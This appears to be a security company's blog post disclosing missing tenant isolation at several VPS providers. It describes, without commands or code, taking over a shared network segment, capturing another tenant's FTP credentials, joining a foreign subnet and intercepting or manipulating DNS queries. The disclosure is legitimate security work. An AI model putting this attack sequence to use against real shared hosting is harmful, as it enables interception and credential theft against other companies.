top of page

Critical vulnerabilities in VPS providers

Updated: Apr 24


Look at this image and answer quickly: would you allow this?


Would you let a stranger into your datacenter and connect to the network fabric?

Would you put your servers in a datacenter where strangers can enter and connect to the network?


Okay, these questions might seem silly and the answers obvious, but what if we told you that this happens more often than you might think?


What if we told you that it is even worse, because it happens without this “hacker” figure having to risk their physical integrity to access a datacenter, without having to go through security guards, doors, access controls and surveillance cameras?


Believe me: without knowing this, many companies are putting their data, their systems and the foundation of their business in vulnerable structures.



Security analysis in the provider framework


NETSENSOR, a Brazilian company that develops cybersecurity technologies based on artificial intelligence, uses the structure of the world's largest clouds and, also, of some local providers, to reach a greater coverage in its points of presence and, with that, to obtain a greater efficiency in its services.


However, before putting its services on a Cloud or an on-premises provider, the company does a security analysis on the new provider's structure. And it was precisely during these security analyzes that serious vulnerabilities in VPS (Virtual Private Server) providers were identified.


Such vulnerabilities allow:

  • Capture network traffic from other servers belonging to other companies;

  • Infiltrate networks of which one is not a part;

  • Take control of the network.


In this way, exploited vulnerabilities allow breaking “all” pillars of information security: confidentiality, integrity and availability.


To have a more accurate idea of the severity of the vulnerabilities found, we evaluated them using the parameters of the most used independent system in the world for security vulnerability scoring, the CVSS (Common Vulnerability Scoring System).


This scoring system is used by Miter to classify CVEs (Common Vulnerabilities and Exposures) and followed by the largest technology companies on the planet.

The scoring system considers several aspects and rates a vulnerability with a severity score between 0 and 10.


The vulnerability found in the providers' VPS framework is rated 10 by the CVSS system, which represents the highest possible level of criticality.


“Base” score for severity


“Temporal” score for severity


“Environmental” score for severity



Providers in Europe, USA and Brazil were evaluated, in which we achieved an astounding 75% success rate in their exploration. Considering only providers in Brazil, the success rate was 100%.


We will disclose some evidence that proves the existence and exploitation of such vulnerabilities found.



Taking control of the network


Analyzing the server network settings of one of the providers evaluated, we can observe that the valid IP for external access is directly addressed in the network interface.


Network interface settings



The server was allocated on a “/26” network, which has a size of 64 IP addresses, 62 of which can be used for addressing equipment. On our network, addresses range between XXX.YYY.199.193 and XXX.YYY.199.254.

Making a query for active addresses on this network, we received a response from 44 devices.


Search for active IPs on the network



Using a tool to capture network traffic coming from other servers connected to the same network, we didn't receive any packets, which is the expected operation.


Capture traffic from other servers (before the attack)



As we successfully explored techniques to take control of the network, we began to receive packets from other servers belonging to other companies.


Capture traffic from other servers (after the attack)



Assuming network traffic from another company's server


Among the servers found, we selected XXX.YYY.199.238 as a random target.

Let's do a more targeted attack and take control of network traffic from just that server.


For demonstration purposes, we analyzed the services present on the target and selected the FTP service, known for transmitting data in plain text.


Active services on the target server


To simulate user access, we use an external desktop to make a simple FTP connection to our target via the internet.


FTP client


Already on our VPS server, which took control of the target's network traffic, we analyzed all FTP traffic from the victim's server.


FTP credential capture


In the contents of the network packets we can see the username and password used in the authentication attempt that we simulated.


The issue here is not to discuss the characteristics of the FTP protocol, but the fact that we are able to intercept the network traffic of the target server, belonging to another company that is sharing the structure of the provider.


It is important to emphasize that NETSENSOR only proved the existence of the vulnerability and its exploitation, quickly returning control of network traffic to the legitimate structure of the provider.


However, we point out that an attacker could, for example, wait for a legitimate user of the system to access via FTP, perhaps to update files from a WEB system on that server, and then capture the credentials and, thus, be able to access company data. and source codes of the system(s).

By exploiting other attack techniques, a criminal can even gain access to that company's entire server.


Many other exploits could be made, such as capturing credentials in SMTP, POP3 and IMAP services, in addition to accessing data transmitted by these protocols.



Infiltrating other networks


For this new step, let's choose another provider.

On this other server we have the address XXX.YYY.106.81, with the same characteristics of having the external IP address directly on the network interface.


Network interface settings


We identified traffic coming from other logical networks of the provider, which did not involve our VPS server, reaching our network device.

Thus, we can conclude that there is no segmentation of logical networks, such as, for example, a VLAN implementation isolating each of the networks.


Capture traffic from other servers (before the attack)


We randomly chose the XXX.YYY.51.0 network as a target.

We identified that the IP ending .15 was free on this network and created a subnetwork interface with that address.


Network sub-interface settings


To prove the success of the infiltration in this network, which we should not be part of, we used traceroute to show us the path taken to communicate with another IP on the network, the “.16”.

As we can see, the path went through only 1 hop, showing that the communication happened directly, without going through intermediary equipment (routers/firewalls).


Direct communication with target


Again we use a tool to capture the network traffic coming from other servers connected to the network that we infiltrate and we don't receive any packets, which is the expected operation.


Capture traffic from other servers (before the attack)


As we successfully re-explored the technique to take control of the network, we started to receive packets from other servers belonging to other companies.


Capture traffic from other servers (after the attack)


In addition to being able to capture network traffic from other servers, breaking the “Confidentiality” pillar, we can intercept and manipulate data, also breaking the “Integrity” pillar.

In the case of DNS queries, we can intercept requests and manipulate responses, directing the victim to malicious places, where we can capture credentials, data or even spread malware.

Capture DNS queries from other servers


Por último, podemos simplesmente interromper a comunicação da vítima, quebrando o pilar da “Disponibilidade”.



Conclusão


NETSENSOR advises that every care is taken when choosing a provider to place your data, your systems and your business.


Just as you look for good professionals to help take care of your business, to design, develop and maintain your systems, it is essential that you also look for good information security professionals to analyze and support decision making, including the place where you will deposit one of the most valuable assets today, your data.


It is not enough to have a great idea and develop the best solutions to meet the needs of your customers, you also need to maintain the operation and availability of the business but, above all, you must ensure the security, reputation and credibility of your company in the face of an increasingly competitive and demanding market.

12 views0 comments

Comments


Post: Blog2_Post
bottom of page